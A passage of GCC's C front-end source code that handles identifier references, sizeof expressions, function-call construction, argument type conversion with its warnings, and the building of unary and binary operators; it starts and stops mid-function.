*type = NULL;
if (decl && decl != error_mark_node)
{
ref = decl;
*type = TREE_TYPE (ref);
}
else if (fun)
/* Implicit function declaration. */
ref = implicitly_declare (loc, id);
else if (decl == error_mark_node)
/* Don't complain about something that's already been
complained about. */
return error_mark_node;
else
{
undeclared_variable (loc, id);
return error_mark_node;
}
if (TREE_TYPE (ref) == error_mark_node)
return error_mark_node;
if (TREE_DEPRECATED (ref))
warn_deprecated_use (ref, NULL_TREE);
/* Recursive call does not count as usage. */
if (ref != current_function_decl)
{
TREE_USED (ref) = 1;
}
if (TREE_CODE (ref) == FUNCTION_DECL && !in_alignof)
{
if (!in_sizeof && !in_typeof)
C_DECL_USED (ref) = 1;
else if (DECL_INITIAL (ref) == NULL_TREE
&& DECL_EXTERNAL (ref)
&& !TREE_PUBLIC (ref))
record_maybe_used_decl (ref);
}
if (TREE_CODE (ref) == CONST_DECL)
{
used_types_insert (TREE_TYPE (ref));
if (warn_cxx_compat
&& TREE_CODE (TREE_TYPE (ref)) == ENUMERAL_TYPE
&& C_TYPE_DEFINED_IN_STRUCT (TREE_TYPE (ref)))
{
warning_at (loc, OPT_Wc___compat,
("enum constant defined in struct or union "
"is not visible in C++"));
inform (DECL_SOURCE_LOCATION (ref), "enum constant defined here");
}
ref = DECL_INITIAL (ref);
TREE_CONSTANT (ref) = 1;
}
else if (current_function_decl != NULL_TREE
&& !DECL_FILE_SCOPE_P (current_function_decl)
&& (VAR_OR_FUNCTION_DECL_P (ref)
|| TREE_CODE (ref) == PARM_DECL))
{
tree context = decl_function_context (ref);
if (context != NULL_TREE && context != current_function_decl)
DECL_NONLOCAL (ref) = 1;
}
/* C99 6.7.4p3: An inline definition of a function with external
linkage ... shall not contain a reference to an identifier with
internal linkage. */
else if (current_function_decl != NULL_TREE
&& DECL_DECLARED_INLINE_P (current_function_decl)
&& DECL_EXTERNAL (current_function_decl)
&& VAR_OR_FUNCTION_DECL_P (ref)
&& (!VAR_P (ref) || TREE_STATIC (ref))
&& ! TREE_PUBLIC (ref)
&& DECL_CONTEXT (ref) != current_function_decl)
record_inline_static (loc, current_function_decl, ref,
csi_internal);
return ref;
}
/* Record details of decls possibly used inside sizeof or typeof. */
struct maybe_used_decl
{
/* The decl. */
tree decl;
/* The level seen at (in_sizeof + in_typeof). */
int level;
/* The next one at this level or above, or NULL. */
struct maybe_used_decl *next;
};
static struct maybe_used_decl *maybe_used_decls;
/* Record that DECL, an undefined static function reference seen
inside sizeof or typeof, might be used if the operand of sizeof is
a VLA type or the operand of typeof is a variably modified
type. */
static void
record_maybe_used_decl (tree decl)
{
struct maybe_used_decl *t = XOBNEW (&parser_obstack, struct maybe_used_decl);
t->decl = decl;
t->level = in_sizeof + in_typeof;
t->next = maybe_used_decls;
maybe_used_decls = t;
}
/* Pop the stack of decls possibly used inside sizeof or typeof. If
USED is false, just discard them. If it is true, mark them used
(if no longer inside sizeof or typeof) or move them to the next
level up (if still inside sizeof or typeof). */
void
pop_maybe_used (bool used)
{
struct maybe_used_decl *p = maybe_used_decls;
int cur_level = in_sizeof + in_typeof;
while (p && p->level > cur_level)
{
if (used)
{
if (cur_level == 0)
C_DECL_USED (p->decl) = 1;
else
p->level = cur_level;
}
p = p->next;
}
if (!used || cur_level == 0)
maybe_used_decls = p;
}
/* Return the result of sizeof applied to EXPR. */
struct c_expr
c_expr_sizeof_expr (location_t loc, struct c_expr expr)
{
struct c_expr ret;
if (expr.value == error_mark_node)
{
ret.value = error_mark_node;
ret.original_code = ERROR_MARK;
ret.original_type = NULL;
pop_maybe_used (false);
}
else
{
bool expr_const_operands = true;
if (TREE_CODE (expr.value) == PARM_DECL
&& C_ARRAY_PARAMETER (expr.value))
{
auto_diagnostic_group d;
if (warning_at (loc, OPT_Wsizeof_array_argument,
"%<sizeof%> on array function parameter %qE will "
"return size of %qT", expr.value,
TREE_TYPE (expr.value)))
inform (DECL_SOURCE_LOCATION (expr.value), "declared here");
}
tree folded_expr = c_fully_fold (expr.value, require_constant_value,
&expr_const_operands);
ret.value = c_sizeof (loc, TREE_TYPE (folded_expr));
c_last_sizeof_arg = expr.value;
c_last_sizeof_loc = loc;
ret.original_code = SIZEOF_EXPR;
ret.original_type = NULL;
if (c_vla_type_p (TREE_TYPE (folded_expr)))
{
/* sizeof is evaluated when given a vla (C99 6.5.3.4p2). */
ret.value = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret.value),
folded_expr, ret.value);
C_MAYBE_CONST_EXPR_NON_CONST (ret.value) = !expr_const_operands;
SET_EXPR_LOCATION (ret.value, loc);
}
pop_maybe_used (C_TYPE_VARIABLE_SIZE (TREE_TYPE (folded_expr)));
}
return ret;
}
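/* Illustrative example: in
     int n = 4;
     int a[n];
     size_t s = sizeof a;
   the operand A has variably modified type, so the result above is a
   C_MAYBE_CONST_EXPR pairing the folded operand with the runtime
   size computation: sizeof is evaluated, not folded to a constant
   (C99 6.5.3.4p2).  */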
/* Return the result of sizeof applied to T, a structure for the type
name passed to sizeof (rather than the type itself). LOC is the
location of the original expression. */
struct c_expr
c_expr_sizeof_type (location_t loc, struct c_type_name *t)
{
tree type;
struct c_expr ret;
tree type_expr = NULL_TREE;
bool type_expr_const = true;
type = groktypename (t, &type_expr, &type_expr_const);
ret.value = c_sizeof (loc, type);
c_last_sizeof_arg = type;
c_last_sizeof_loc = loc;
ret.original_code = SIZEOF_EXPR;
ret.original_type = NULL;
if ((type_expr || TREE_CODE (ret.value) == INTEGER_CST)
&& c_vla_type_p (type))
{
/* If the type is a [*] array, it is a VLA but is represented as
having a size of zero. In such a case we must ensure that
the result of sizeof does not get folded to a constant by
c_fully_fold, because if the size is evaluated the result is
not constant and so constraints on zero or negative size
arrays must not be applied when this sizeof call is inside
another array declarator. */
if (!type_expr)
type_expr = integer_zero_node;
ret.value = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret.value),
type_expr, ret.value);
C_MAYBE_CONST_EXPR_NON_CONST (ret.value) = !type_expr_const;
}
pop_maybe_used (type != error_mark_node
? C_TYPE_VARIABLE_SIZE (type) : false);
return ret;
}
/* Build a function call to function FUNCTION with parameters PARAMS.
The function call is at LOC.
PARAMS is a list--a chain of TREE_LIST nodes--in which the
TREE_VALUE of each node is a parameter-expression.
FUNCTION's data type may be a function type or a pointer-to-function. */
tree
build_function_call (location_t loc, tree function, tree params)
{
vec<tree, va_gc> *v;
tree ret;
vec_alloc (v, list_length (params));
for (; params; params = TREE_CHAIN (params))
v->quick_push (TREE_VALUE (params));
ret = c_build_function_call_vec (loc, vNULL, function, v, NULL);
vec_free (v);
return ret;
}
/* Give a note about the location of the declaration of DECL. */
static void
inform_declaration (tree decl)
{
if (decl && (TREE_CODE (decl) != FUNCTION_DECL || !DECL_IS_BUILTIN (decl)))
inform (DECL_SOURCE_LOCATION (decl), "declared here");
}
/* Build a function call to function FUNCTION with parameters PARAMS.
If FUNCTION is the result of resolving an overloaded target built-in,
ORIG_FUNDECL is the original function decl, otherwise it is null.
ORIGTYPES, if not NULL, is a vector of types; each element is
either NULL or the original type of the corresponding element in
PARAMS. The original type may differ from TREE_TYPE of the
parameter for enums. FUNCTION's data type may be a function type
or pointer-to-function. This function changes the elements of
PARAMS. */
tree
build_function_call_vec (location_t loc, vec<location_t> arg_loc,
tree function, vec<tree, va_gc> *params,
vec<tree, va_gc> *origtypes, tree orig_fundecl)
{
tree fntype, fundecl = NULL_TREE;
tree name = NULL_TREE, result;
tree tem;
int nargs;
tree *argarray;
  /* Strip NON_LVALUE_EXPRs, etc., since we aren't using it as an lvalue.  */
STRIP_TYPE_NOPS (function);
/* Convert anything with function type to a pointer-to-function. */
if (TREE_CODE (function) == FUNCTION_DECL)
{
name = DECL_NAME (function);
if (flag_tm)
tm_malloc_replacement (function);
fundecl = function;
if (!orig_fundecl)
orig_fundecl = fundecl;
/* Atomic functions have type checking/casting already done. They are
often rewritten and don't match the original parameter list. */
if (name && !strncmp (IDENTIFIER_POINTER (name), "__atomic_", 9))
origtypes = NULL;
}
if (TREE_CODE (TREE_TYPE (function)) == FUNCTION_TYPE)
function = function_to_pointer_conversion (loc, function);
/* For Objective-C, convert any calls via a cast to OBJC_TYPE_REF
expressions, like those used for ObjC messenger dispatches. */
if (params && !params->is_empty ())
function = objc_rewrite_function_call (function, (*params)[0]);
function = c_fully_fold (function, false, NULL);
fntype = TREE_TYPE (function);
if (TREE_CODE (fntype) == ERROR_MARK)
return error_mark_node;
if (!(TREE_CODE (fntype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (fntype)) == FUNCTION_TYPE))
{
if (!flag_diagnostics_show_caret)
error_at (loc,
"called object %qE is not a function or function pointer",
function);
else if (DECL_P (function))
{
error_at (loc,
"called object %qD is not a function or function pointer",
function);
inform_declaration (function);
}
else
error_at (loc,
"called object is not a function or function pointer");
return error_mark_node;
}
if (fundecl && TREE_THIS_VOLATILE (fundecl))
current_function_returns_abnormally = 1;
/* fntype now gets the type of function pointed to. */
fntype = TREE_TYPE (fntype);
/* Convert the parameters to the types declared in the
function prototype, or apply default promotions. */
nargs = convert_arguments (loc, arg_loc, TYPE_ARG_TYPES (fntype), params,
origtypes, function, fundecl);
if (nargs < 0)
return error_mark_node;
/* Check that the function is called through a compatible prototype.
If it is not, warn. */
if (CONVERT_EXPR_P (function)
&& TREE_CODE (tem = TREE_OPERAND (function, 0)) == ADDR_EXPR
&& TREE_CODE (tem = TREE_OPERAND (tem, 0)) == FUNCTION_DECL
&& !comptypes (fntype, TREE_TYPE (tem)))
{
tree return_type = TREE_TYPE (fntype);
/* This situation leads to run-time undefined behavior. We can't,
therefore, simply error unless we can prove that all possible
executions of the program must execute the code. */
warning_at (loc, 0, "function called through a non-compatible type");
if (VOID_TYPE_P (return_type)
&& TYPE_QUALS (return_type) != TYPE_UNQUALIFIED)
pedwarn (loc, 0,
"function with qualified void return type called");
}
argarray = vec_safe_address (params);
/* Check that arguments to builtin functions match the expectations. */
if (fundecl
&& fndecl_built_in_p (fundecl)
&& !check_builtin_function_arguments (loc, arg_loc, fundecl,
orig_fundecl, nargs, argarray))
return error_mark_node;
/* Check that the arguments to the function are valid. */
bool warned_p = check_function_arguments (loc, fundecl, fntype,
nargs, argarray, &arg_loc);
if (name != NULL_TREE
&& !strncmp (IDENTIFIER_POINTER (name), "__builtin_", 10))
{
if (require_constant_value)
result
= fold_build_call_array_initializer_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
else
result = fold_build_call_array_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
if (TREE_CODE (result) == NOP_EXPR
&& TREE_CODE (TREE_OPERAND (result, 0)) == INTEGER_CST)
STRIP_TYPE_NOPS (result);
}
else
result = build_call_array_loc (loc, TREE_TYPE (fntype),
function, nargs, argarray);
/* If -Wnonnull warning has been diagnosed, avoid diagnosing it again
later. */
if (warned_p && TREE_CODE (result) == CALL_EXPR)
TREE_NO_WARNING (result) = 1;
/* In this improbable scenario, a nested function returns a VM type.
Create a TARGET_EXPR so that the call always has a LHS, much as
what the C++ FE does for functions returning non-PODs. */
if (variably_modified_type_p (TREE_TYPE (fntype), NULL_TREE))
{
tree tmp = create_tmp_var_raw (TREE_TYPE (fntype));
result = build4 (TARGET_EXPR, TREE_TYPE (fntype), tmp, result,
NULL_TREE, NULL_TREE);
}
if (VOID_TYPE_P (TREE_TYPE (result)))
{
if (TYPE_QUALS (TREE_TYPE (result)) != TYPE_UNQUALIFIED)
pedwarn (loc, 0,
"function with qualified void return type called");
return result;
}
return require_complete_type (loc, result);
}
/* Like build_function_call_vec, but call also resolve_overloaded_builtin. */
tree
c_build_function_call_vec (location_t loc, vec<location_t> arg_loc,
tree function, vec<tree, va_gc> *params,
vec<tree, va_gc> *origtypes)
{
  /* Strip NON_LVALUE_EXPRs, etc., since we aren't using it as an lvalue.  */
STRIP_TYPE_NOPS (function);
/* Convert anything with function type to a pointer-to-function. */
if (TREE_CODE (function) == FUNCTION_DECL)
{
/* Implement type-directed function overloading for builtins.
resolve_overloaded_builtin and targetm.resolve_overloaded_builtin
handle all the type checking. The result is a complete expression
that implements this function call. */
tree tem = resolve_overloaded_builtin (loc, function, params);
if (tem)
return tem;
}
return build_function_call_vec (loc, arg_loc, function, params, origtypes);
}
/* Helper for convert_arguments, called to convert the VALue of
   argument number ARGNUM, of original type ORIGTYPE, to TYPE, the
   type of the corresponding parameter number PARMNUM.
PLOC is the location where the conversion is being performed.
FUNCTION and FUNDECL are the same as in convert_arguments.
VALTYPE is the original type of VAL before the conversion and,
for EXCESS_PRECISION_EXPR, the operand of the expression.
NPC is true if VAL represents the null pointer constant (VAL itself
will have been folded to an integer constant).
RNAME is the same as FUNCTION except in Objective C when it's
the function selector.
EXCESS_PRECISION is true when VAL was originally represented
as EXCESS_PRECISION_EXPR.
WARNOPT is the same as in convert_for_assignment. */
static tree
convert_argument (location_t ploc, tree function, tree fundecl,
tree type, tree origtype, tree val, tree valtype,
bool npc, tree rname, int parmnum, int argnum,
bool excess_precision, int warnopt)
{
/* Formal parm type is specified by a function prototype. */
if (type == error_mark_node || !COMPLETE_TYPE_P (type))
{
error_at (ploc, "type of formal parameter %d is incomplete",
parmnum + 1);
return val;
}
/* Optionally warn about conversions that differ from the default
conversions. */
if (warn_traditional_conversion || warn_traditional)
{
unsigned int formal_prec = TYPE_PRECISION (type);
if (INTEGRAL_TYPE_P (type)
&& TREE_CODE (valtype) == REAL_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as integer rather "
"than floating due to prototype",
argnum, rname);
if (INTEGRAL_TYPE_P (type)
&& TREE_CODE (valtype) == COMPLEX_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as integer rather "
"than complex due to prototype",
argnum, rname);
else if (TREE_CODE (type) == COMPLEX_TYPE
&& TREE_CODE (valtype) == REAL_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as complex rather "
"than floating due to prototype",
argnum, rname);
else if (TREE_CODE (type) == REAL_TYPE
&& INTEGRAL_TYPE_P (valtype))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as floating rather "
"than integer due to prototype",
argnum, rname);
else if (TREE_CODE (type) == COMPLEX_TYPE
&& INTEGRAL_TYPE_P (valtype))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as complex rather "
"than integer due to prototype",
argnum, rname);
else if (TREE_CODE (type) == REAL_TYPE
&& TREE_CODE (valtype) == COMPLEX_TYPE)
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE as floating rather "
"than complex due to prototype",
argnum, rname);
/* ??? At some point, messages should be written about
conversions between complex types, but that's too messy
to do now. */
else if (TREE_CODE (type) == REAL_TYPE
&& TREE_CODE (valtype) == REAL_TYPE)
{
/* Warn if any argument is passed as `float',
since without a prototype it would be `double'. */
if (formal_prec == TYPE_PRECISION (float_type_node)
&& type != dfloat32_type_node)
warning_at (ploc, 0,
"passing argument %d of %qE as %<float%> "
"rather than %<double%> due to prototype",
argnum, rname);
/* Warn if mismatch between argument and prototype
for decimal float types. Warn of conversions with
binary float types and of precision narrowing due to
prototype. */
else if (type != valtype
&& (type == dfloat32_type_node
|| type == dfloat64_type_node
|| type == dfloat128_type_node
|| valtype == dfloat32_type_node
|| valtype == dfloat64_type_node
|| valtype == dfloat128_type_node)
&& (formal_prec
<= TYPE_PRECISION (valtype)
|| (type == dfloat128_type_node
&& (valtype
!= dfloat64_type_node
&& (valtype
!= dfloat32_type_node)))
|| (type == dfloat64_type_node
&& (valtype
!= dfloat32_type_node))))
warning_at (ploc, 0,
"passing argument %d of %qE as %qT "
"rather than %qT due to prototype",
argnum, rname, type, valtype);
}
      /* Detect integer arguments changing in width or signedness.
	 These warnings are only activated with
	 -Wtraditional-conversion, not with -Wtraditional.  */
else if (warn_traditional_conversion
&& INTEGRAL_TYPE_P (type)
&& INTEGRAL_TYPE_P (valtype))
{
tree would_have_been = default_conversion (val);
tree type1 = TREE_TYPE (would_have_been);
if (val == error_mark_node)
/* VAL could have been of incomplete type. */;
else if (TREE_CODE (type) == ENUMERAL_TYPE
&& (TYPE_MAIN_VARIANT (type)
== TYPE_MAIN_VARIANT (valtype)))
/* No warning if function asks for enum
and the actual arg is that enum type. */
;
else if (formal_prec != TYPE_PRECISION (type1))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"with different width due to prototype",
argnum, rname);
else if (TYPE_UNSIGNED (type) == TYPE_UNSIGNED (type1))
;
/* Don't complain if the formal parameter type
is an enum, because we can't tell now whether
the value was an enum--even the same enum. */
else if (TREE_CODE (type) == ENUMERAL_TYPE)
;
else if (TREE_CODE (val) == INTEGER_CST
&& int_fits_type_p (val, type))
/* Change in signedness doesn't matter
if a constant value is unaffected. */
;
/* If the value is extended from a narrower
unsigned type, it doesn't matter whether we
pass it as signed or unsigned; the value
certainly is the same either way. */
else if (TYPE_PRECISION (valtype) < TYPE_PRECISION (type)
&& TYPE_UNSIGNED (valtype))
;
else if (TYPE_UNSIGNED (type))
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"as unsigned due to prototype",
argnum, rname);
else
warning_at (ploc, OPT_Wtraditional_conversion,
"passing argument %d of %qE "
"as signed due to prototype",
argnum, rname);
}
}
/* Possibly restore an EXCESS_PRECISION_EXPR for the
sake of better warnings from convert_and_check. */
if (excess_precision)
val = build1 (EXCESS_PRECISION_EXPR, valtype, val);
tree parmval = convert_for_assignment (ploc, ploc, type,
val, origtype, ic_argpass,
npc, fundecl, function,
parmnum + 1, warnopt);
if (targetm.calls.promote_prototypes (fundecl ? TREE_TYPE (fundecl) : 0)
&& INTEGRAL_TYPE_P (type)
&& (TYPE_PRECISION (type) < TYPE_PRECISION (integer_type_node)))
parmval = default_conversion (parmval);
return parmval;
}
/* Convert the argument expressions in the vector VALUES
to the types in the list TYPELIST.
If TYPELIST is exhausted, or when an element has NULL as its type,
perform the default conversions.
ORIGTYPES is the original types of the expressions in VALUES. This
holds the type of enum values which have been converted to integral
types. It may be NULL.
FUNCTION is a tree for the called function. It is used only for
error messages, where it is formatted with %qE.
This is also where warnings about wrong number of args are generated.
ARG_LOC are locations of function arguments (if any).
Returns the actual number of arguments processed (which may be less
than the length of VALUES in some error situations), or -1 on
failure. */
static int
convert_arguments (location_t loc, vec<location_t> arg_loc, tree typelist,
vec<tree, va_gc> *values, vec<tree, va_gc> *origtypes,
tree function, tree fundecl)
{
unsigned int parmnum;
bool error_args = false;
const bool type_generic = fundecl
&& lookup_attribute ("type generic", TYPE_ATTRIBUTES (TREE_TYPE (fundecl)));
bool type_generic_remove_excess_precision = false;
bool type_generic_overflow_p = false;
tree selector;
/* Change pointer to function to the function itself for
diagnostics. */
if (TREE_CODE (function) == ADDR_EXPR
&& TREE_CODE (TREE_OPERAND (function, 0)) == FUNCTION_DECL)
function = TREE_OPERAND (function, 0);
/* Handle an ObjC selector specially for diagnostics. */
selector = objc_message_selector ();
  /* For a call to a built-in function declared without a prototype,
     BUILTIN_TYPELIST is set to the built-in function's argument list.  */
tree builtin_typelist = NULL_TREE;
/* For type-generic built-in functions, determine whether excess
precision should be removed (classification) or not
(comparison). */
if (fundecl
&& fndecl_built_in_p (fundecl, BUILT_IN_NORMAL))
{
built_in_function code = DECL_FUNCTION_CODE (fundecl);
if (C_DECL_BUILTIN_PROTOTYPE (fundecl))
{
	  /* For a call to a built-in function declared without a prototype,
	     use the parameter types of the internal built-in function to
	     check the argument types against.  */
if (tree bdecl = builtin_decl_explicit (code))
builtin_typelist = TYPE_ARG_TYPES (TREE_TYPE (bdecl));
}
/* For type-generic built-in functions, determine whether excess
precision should be removed (classification) or not
(comparison). */
if (type_generic)
switch (code)
{
case BUILT_IN_ISFINITE:
case BUILT_IN_ISINF:
case BUILT_IN_ISINF_SIGN:
case BUILT_IN_ISNAN:
case BUILT_IN_ISNORMAL:
case BUILT_IN_FPCLASSIFY:
type_generic_remove_excess_precision = true;
break;
case BUILT_IN_ADD_OVERFLOW_P:
case BUILT_IN_SUB_OVERFLOW_P:
case BUILT_IN_MUL_OVERFLOW_P:
/* The last argument of these type-generic builtins
should not be promoted. */
type_generic_overflow_p = true;
break;
default:
break;
}
}
/* Scan the given expressions (VALUES) and types (TYPELIST), producing
individual converted arguments. */
tree typetail, builtin_typetail, val;
for (typetail = typelist,
builtin_typetail = builtin_typelist,
parmnum = 0;
values && values->iterate (parmnum, &val);
++parmnum)
{
/* The type of the function parameter (if it was declared with one). */
tree type = typetail ? TREE_VALUE (typetail) : NULL_TREE;
/* The type of the built-in function parameter (if the function
is a built-in). Used to detect type incompatibilities in
calls to built-ins declared without a prototype. */
tree builtin_type = (builtin_typetail
? TREE_VALUE (builtin_typetail) : NULL_TREE);
/* The original type of the argument being passed to the function. */
tree valtype = TREE_TYPE (val);
/* The called function (or function selector in Objective C). */
tree rname = function;
int argnum = parmnum + 1;
const char *invalid_func_diag;
/* Set for EXCESS_PRECISION_EXPR arguments. */
bool excess_precision = false;
/* The value of the argument after conversion to the type
of the function parameter it is passed to. */
tree parmval;
      /* Some __atomic_* builtins have an additional hidden argument at
	 position 0.  */
location_t ploc
= !arg_loc.is_empty () && values->length () == arg_loc.length ()
? expansion_point_location_if_in_system_header (arg_loc[parmnum])
: input_location;
if (type == void_type_node)
{
if (selector)
error_at (loc, "too many arguments to method %qE", selector);
else
error_at (loc, "too many arguments to function %qE", function);
inform_declaration (fundecl);
return error_args ? -1 : (int) parmnum;
}
if (builtin_type == void_type_node)
{
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
"too many arguments to built-in function %qE "
"expecting %d", function, parmnum))
inform_declaration (fundecl);
builtin_typetail = NULL_TREE;
}
if (selector && argnum > 2)
{
rname = selector;
argnum -= 2;
}
/* Determine if VAL is a null pointer constant before folding it. */
bool npc = null_pointer_constant_p (val);
/* If there is excess precision and a prototype, convert once to
the required type rather than converting via the semantic
type. Likewise without a prototype a float value represented
as long double should be converted once to double. But for
type-generic classification functions excess precision must
be removed here. */
if (TREE_CODE (val) == EXCESS_PRECISION_EXPR
&& (type || !type_generic || !type_generic_remove_excess_precision))
{
val = TREE_OPERAND (val, 0);
excess_precision = true;
}
val = c_fully_fold (val, false, NULL);
STRIP_TYPE_NOPS (val);
val = require_complete_type (ploc, val);
/* Some floating-point arguments must be promoted to double when
no type is specified by a prototype. This applies to
arguments of type float, and to architecture-specific types
(ARM __fp16), but not to _FloatN or _FloatNx types. */
bool promote_float_arg = false;
if (type == NULL_TREE
&& TREE_CODE (valtype) == REAL_TYPE
&& (TYPE_PRECISION (valtype)
<= TYPE_PRECISION (double_type_node))
&& TYPE_MAIN_VARIANT (valtype) != double_type_node
&& TYPE_MAIN_VARIANT (valtype) != long_double_type_node
&& !DECIMAL_FLOAT_MODE_P (TYPE_MODE (valtype)))
{
/* Promote this argument, unless it has a _FloatN or
_FloatNx type. */
promote_float_arg = true;
for (int i = 0; i < NUM_FLOATN_NX_TYPES; i++)
if (TYPE_MAIN_VARIANT (valtype) == FLOATN_NX_TYPE_NODE (i))
{
promote_float_arg = false;
break;
}
}
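      /* Illustrative example: for "float fv;" passed in the variable
	 arguments of "printf ("%f", fv);" there is no parameter type,
	 so FV is promoted to double below; an argument of type
	 _Float32 would be passed unchanged.  */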
if (type != NULL_TREE)
{
tree origtype = (!origtypes) ? NULL_TREE : (*origtypes)[parmnum];
parmval = convert_argument (ploc, function, fundecl, type, origtype,
val, valtype, npc, rname, parmnum, argnum,
excess_precision, 0);
}
else if (promote_float_arg)
{
if (type_generic)
parmval = val;
else
{
/* Convert `float' to `double'. */
if (warn_double_promotion && !c_inhibit_evaluation_warnings)
warning_at (ploc, OPT_Wdouble_promotion,
"implicit conversion from %qT to %qT when passing "
"argument to function",
valtype, double_type_node);
parmval = convert (double_type_node, val);
}
}
else if ((excess_precision && !type_generic)
|| (type_generic_overflow_p && parmnum == 2))
/* A "double" argument with excess precision being passed
without a prototype or in variable arguments.
The last argument of __builtin_*_overflow_p should not be
promoted. */
parmval = convert (valtype, val);
else if ((invalid_func_diag =
targetm.calls.invalid_arg_for_unprototyped_fn (typelist, fundecl, val)))
{
error (invalid_func_diag);
return -1;
}
else if (TREE_CODE (val) == ADDR_EXPR && reject_gcc_builtin (val))
{
return -1;
}
else
/* Convert `short' and `char' to full-size `int'. */
parmval = default_conversion (val);
(*values)[parmnum] = parmval;
if (parmval == error_mark_node)
error_args = true;
if (!type && builtin_type && TREE_CODE (builtin_type) != VOID_TYPE)
{
/* For a call to a built-in function declared without a prototype,
perform the conversions from the argument to the expected type
but issue warnings rather than errors for any mismatches.
Ignore the converted argument and use the PARMVAL obtained
above by applying default conversions instead. */
tree origtype = (!origtypes) ? NULL_TREE : (*origtypes)[parmnum];
convert_argument (ploc, function, fundecl, builtin_type, origtype,
val, valtype, npc, rname, parmnum, argnum,
excess_precision,
OPT_Wbuiltin_declaration_mismatch);
}
if (typetail)
typetail = TREE_CHAIN (typetail);
if (builtin_typetail)
builtin_typetail = TREE_CHAIN (builtin_typetail);
}
gcc_assert (parmnum == vec_safe_length (values));
if (typetail != NULL_TREE && TREE_VALUE (typetail) != void_type_node)
{
error_at (loc, "too few arguments to function %qE", function);
inform_declaration (fundecl);
return -1;
}
if (builtin_typetail && TREE_VALUE (builtin_typetail) != void_type_node)
{
unsigned nargs = parmnum;
for (tree t = builtin_typetail; t; t = TREE_CHAIN (t))
++nargs;
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
"too few arguments to built-in function %qE "
"expecting %u", function, nargs - 1))
inform_declaration (fundecl);
}
return error_args ? -1 : (int) parmnum;
}
/* This is the entry point used by the parser to build unary operators
in the input. CODE, a tree_code, specifies the unary operator, and
ARG is the operand. For unary plus, the C parser currently uses
CONVERT_EXPR for code.
LOC is the location to use for the tree generated.
*/
struct c_expr
parser_build_unary_op (location_t loc, enum tree_code code, struct c_expr arg)
{
struct c_expr result;
result.original_code = code;
result.original_type = NULL;
if (reject_gcc_builtin (arg.value))
{
result.value = error_mark_node;
}
else
{
result.value = build_unary_op (loc, code, arg.value, false);
if (TREE_OVERFLOW_P (result.value) && !TREE_OVERFLOW_P (arg.value))
overflow_warning (loc, result.value, arg.value);
}
/* We are typically called when parsing a prefix token at LOC acting on
ARG. Reflect this by updating the source range of the result to
start at LOC and end at the end of ARG. */
set_c_expr_source_range (&result,
loc, arg.get_finish ());
return result;
}
/* Returns true if TYPE is a character type, *not* including wchar_t. */
static bool
char_type_p (tree type)
{
return (type == char_type_node
|| type == unsigned_char_type_node
|| type == signed_char_type_node
|| type == char16_type_node
|| type == char32_type_node);
}
/* This is the entry point used by the parser to build binary operators
in the input. CODE, a tree_code, specifies the binary operator, and
ARG1 and ARG2 are the operands. In addition to constructing the
expression, we check for operands that were written with other binary
operators in a way that is likely to confuse the user.
LOCATION is the location of the binary operator. */
struct c_expr
parser_build_binary_op (location_t location, enum tree_code code,
struct c_expr arg1, struct c_expr arg2)
{
struct c_expr result;
enum tree_code code1 = arg1.original_code;
enum tree_code code2 = arg2.original_code;
tree type1 = (arg1.original_type
? arg1.original_type
: TREE_TYPE (arg1.value));
tree type2 = (arg2.original_type
? arg2.original_type
: TREE_TYPE (arg2.value));
result.value = build_binary_op (location, code,
arg1.value, arg2.value, true);
result.original_code = code;
result.original_type = NULL;
if (TREE_CODE (result.value) == ERROR_MARK)
{
set_c_expr_source_range (&result,
arg1.get_start (),
arg2.get_finish ());
return result;
}
if (location != UNKNOWN_LOCATION)
protected_set_expr_location (result.value, location);
set_c_expr_source_range (&result,
arg1.get_start (),
arg2.get_finish ());
/* Check for cases such as x+y<<z which users are likely
to misinterpret. */
if (warn_parentheses)
warn_about_parentheses (location, code, code1, arg1.value, code2,
arg2.value);
if (warn_logical_op)
warn_logical_operator (location, code, TREE_TYPE (result.value),
code1, arg1.value, code2, arg2.value);
if (warn_tautological_compare)
{
tree lhs = arg1.value;
tree rhs = arg2.value;
if (TREE_CODE (lhs) == C_MAYBE_CONST_EXPR)
{
if (C_MAYBE_CONST_EXPR_PRE (lhs) != NULL_TREE
&& TREE_SIDE_EFFECTS (C_MAYBE_CONST_EXPR_PRE (lhs)))
lhs = NULL_TREE;
else
lhs = C_MAYBE_CONST_EXPR_EXPR (lhs);
}
if (TREE_CODE (rhs) == C_MAYBE_CONST_EXPR)
{
if (C_MAYBE_CONST_EXPR_PRE (rhs) != NULL_TREE
&& TREE_SIDE_EFFECTS (C_MAYBE_CONST_EXPR_PRE (rhs)))
rhs = NULL_TREE;
else
rhs = C_MAYBE_CONST_EXPR_EXPR (rhs);
}
if (lhs != NULL_TREE && rhs != NULL_TREE)
warn_tautological_cmp (location, code, lhs, rhs);
}
if (warn_logical_not_paren
&& TREE_CODE_CLASS (code) == tcc_comparison
&& code1 == TRUTH_NOT_EXPR
&& code2 != TRUTH_NOT_EXPR
/* Avoid warning for !!x == y. */
&& (TREE_CODE (arg1.value) != NE_EXPR
|| !integer_zerop (TREE_OPERAND (arg1.value, 1))))
{
/* Avoid warning for !b == y where b has _Bool type. */
tree t = integer_zero_node;
if (TREE_CODE (arg1.value) == EQ_EXPR
&& integer_zerop (TREE_OPERAND (arg1.value, 1))
&& TREE_TYPE (TREE_OPERAND (arg1.value, 0)) == integer_type_node)
{
t = TREE_OPERAND (arg1.value, 0);
do
{
if (TREE_TYPE (t) != integer_type_node)
break;
if (TREE_CODE (t) == C_MAYBE_CONST_EXPR)
t = C_MAYBE_CONST_EXPR_EXPR (t);
else if (CONVERT_EXPR_P (t))
t = TREE_OPERAND (t, 0);
else
break;
}
while (1);
}
